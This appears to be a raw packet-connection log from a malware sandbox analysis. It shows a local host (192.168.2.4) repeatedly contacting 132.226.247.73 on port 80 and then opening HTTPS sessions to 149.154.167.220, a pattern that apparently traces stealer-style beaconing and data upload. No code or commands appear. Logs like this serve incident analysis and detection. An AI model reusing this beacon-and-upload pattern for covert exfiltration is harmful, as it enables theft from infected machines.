                                                                            Jan 9, 2025 11:38:40.253839016 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.253865957 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.253876925 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.253907919 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.253926039 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.253963947 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.253977060 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.254010916 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254020929 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.254026890 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254030943 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.254048109 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254096985 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254142046 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254177094 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254204988 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254251957 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254266024 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254304886 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.254333973 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.262900114 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:40.263034105 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:40.263045073 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:41.201661110 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:41.201689959 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:41.201733112 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:41.201745033 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:41.201769114 CET44349768149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:41.201807022 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:41.202172995 CET49768443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:41.295219898 CET4976780192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:41.296148062 CET4976980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:41.300302029 CET8049767132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:41.300456047 CET4976780192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:41.301012039 CET8049769132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:41.301079988 CET4976980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:41.301155090 CET4976980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:41.305948973 CET8049769132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:41.973223925 CET8049769132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:41.979916096 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:41.979940891 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:41.980015039 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:41.980621099 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:41.980633020 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.025298119 CET4976980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:42.604321003 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.605806112 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.605823994 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606276035 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606297016 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606403112 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606422901 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606532097 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606559992 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606652975 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606672049 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606690884 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606707096 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606767893 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606786966 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606794119 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606801987 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606813908 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606822968 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606833935 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606846094 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606884956 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606898069 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606942892 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606950998 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.606967926 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.606975079 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607011080 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607023001 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607038021 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607047081 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607083082 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607095003 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607100964 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607105017 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607121944 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607131958 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607142925 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607150078 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607165098 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607165098 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607172966 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607180119 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607192039 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607198000 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607230902 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607240915 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607249022 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607251883 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607269049 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607276917 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607309103 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607320070 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607333899 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607342005 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607350111 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607352018 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607389927 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607397079 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607409954 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607417107 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607466936 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607474089 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607490063 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607502937 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607542992 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607548952 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607559919 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607573986 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607587099 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607593060 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607625961 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607633114 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607646942 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607659101 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.607696056 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607743025 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607758045 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607812881 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607819080 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607842922 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607887030 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607917070 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.607954979 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.608001947 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.616134882 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:42.616292000 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:42.616302013 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:43.550545931 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:43.550561905 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:43.550611973 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:43.550622940 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:43.550633907 CET44349770149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:43.550766945 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:43.551035881 CET49770443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:43.638828993 CET4976980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:43.639957905 CET4977180192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:43.643975973 CET8049769132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:43.644041061 CET4976980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:43.644778967 CET8049771132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:43.644850969 CET4977180192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:43.644927979 CET4977180192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:43.649641991 CET8049771132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:44.317265034 CET8049771132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:44.331161976 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.331216097 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.331302881 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.332104921 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.332115889 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.369050026 CET4977180192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:44.935921907 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.941598892 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.941617966 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.941943884 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.941957951 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.941971064 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.941978931 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942009926 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942017078 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942029953 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942039013 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942069054 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942107916 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942127943 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942137957 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942152977 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942203999 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942220926 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942231894 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942246914 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942296982 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942347050 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942409039 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942419052 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942480087 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942491055 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942528009 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942538977 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942550898 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942557096 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942564011 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942565918 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942596912 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942612886 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942640066 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942651987 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942662001 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942666054 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942677021 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942689896 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942723989 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942735910 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942760944 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942773104 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942785025 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942790985 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942802906 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942811012 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942836046 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942848921 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942874908 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942887068 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942903996 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942914009 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942950964 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942961931 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942965984 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942969084 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.942985058 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.942996979 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943036079 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943047047 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943056107 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943062067 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943072081 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943078041 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943100929 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943113089 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943121910 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943125010 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943139076 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943147898 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943177938 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943190098 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943202019 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943209887 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.943250895 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943283081 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943303108 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943330050 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.943370104 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952044964 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.952308893 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952318907 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:44.952330112 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952347994 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952403069 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952414989 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952426910 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952446938 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952477932 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.952502012 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:44.956305981 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:45.884186983 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:45.884205103 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:45.884260893 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:45.884268045 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:45.884294033 CET44349772149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:45.884330034 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:45.884732008 CET49772443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:45.959175110 CET4977180192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:45.960099936 CET4977380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:45.964117050 CET8049771132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:45.964184046 CET4977180192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:45.964941025 CET8049773132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:45.965007067 CET4977380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:45.965107918 CET4977380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:45.969819069 CET8049773132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:46.658504009 CET8049773132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:46.664967060 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:46.665003061 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:46.665064096 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:46.665642977 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:46.665653944 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:46.712712049 CET4977380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:47.293637037 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295006990 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295021057 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295203924 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295217991 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295274019 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295281887 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295296907 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295300961 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295341015 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295381069 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295392036 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295407057 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295413017 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295438051 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295458078 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295495033 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295533895 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295551062 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295569897 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295577049 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295604944 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295614958 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295646906 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295656919 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295701981 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295716047 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295744896 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295753956 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295783043 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295826912 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295857906 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295880079 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295893908 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295909882 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295937061 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295962095 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.295977116 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.295986891 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.296015978 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296042919 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.296056032 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296065092 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.296094894 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296132088 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296142101 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.296149969 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.296163082 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296210051 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296241045 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296271086 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.296309948 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.305799961 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.305859089 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.305918932 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.305927038 CET44349774149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:47.305937052 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.305962086 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.305972099 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.305989027 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.305996895 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.306004047 CET49774443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:47.306024075 CET49774443192.168.2.4149.154.167.220
